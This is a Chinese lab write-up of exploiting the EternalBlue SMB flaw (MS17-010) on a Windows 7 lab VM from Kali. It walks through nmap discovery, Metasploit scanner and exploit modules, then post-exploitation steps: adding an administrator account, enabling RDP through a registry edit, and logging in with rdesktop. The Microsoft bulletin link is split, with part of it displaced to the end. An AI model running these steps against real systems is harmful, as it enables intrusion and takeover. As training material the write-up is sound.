实验原理:
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口
实验环境:
操作机:kali-linux-2022.4
靶机:Windows 7 x64
实验原理:
(1)关于ms17-010(Windows SMB远程执行代码漏洞)
微软安全公告KB4013389:
https
实验步骤:
(1)搭建好环境准备,在WMware虚拟机软件中分别建立以kali和win7为镜像的虚拟机,按照步骤安装好后,配置好虚拟机设置以及网络连接。
首先两台虚拟机需要通过桥接实现ping通且win7的防火墙关闭
Kali ip:192.168.140.128
Windows7 ip:192.168.140.129
实现ping通
关闭windows7防火墙
(2)利用nmap完成主机发现
可以发现win7主机且win7的445端口开放
(3)利用msfconsole 进行漏洞扫描,渗透,远程控制
搜索ms17_010代码,使用其中的扫描和攻击模块
扫描模块:auxiliary/admin/smb/ms17_010
攻击模块:exploit/windows/smb/ms17_010_eternalblue
(4)扫描模块利用及显示:
输入options查看选项 RHOSTS为目标主机,利用set命令设置
输入use 3设置扫描目标(靶机ip):set rhosts 192.168.140.129
出现下图显示
输入exploit或run开始运行
出现下图 则扫描成功
显示主机可能容易受到 MS17-010 的攻击! - Windows 7 x64(64 位)
(5)攻击模块利用及显示:
输入:use0设置攻击目标set rhosts 192.168.140.129 出现以下显示
输入exploit或run开始运行 出现win则攻击成功
(6)得到靶机:shell
出现下图乱码
输入:chcp 65001 解决乱码问题
可以发现进入了winows系统
下面就可以对靶机进行远程控制了
首先添加一个新用户jntm并将其设成管理员
创建新用户:net user jntm /add
设成管理员:net localgroup administrators jntm /add
下面想实现远程控制 就需要开启3389端口 因为
利用netstat -ano查看3389端口是否开启
可见上图的3389端口未开放 那么就可以利用
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
把3389端口打开 如图所示
打开以后就需要另外打开一个终端 输入rdesktop 192.168.140.129:3389
出现下图
若未显示 而是询问你yes/no 只需输入yes即可
接着,出现上图所示 点其他用户登录
在登陆时如果出现不知道密码的情况 无法登录
只需要在原来的终端里输入net user jntm(用户名) 123456(密码)
因为是在登录原用户(也是管理员)的情况下 所以会出现下图所示情况
最后登陆成功之后就会出现
永恒之蓝漏洞结束
://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010
此安全更新程序修复了Microsoft Windows中的多个漏洞。如果攻击者向 Windows SMBv1服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。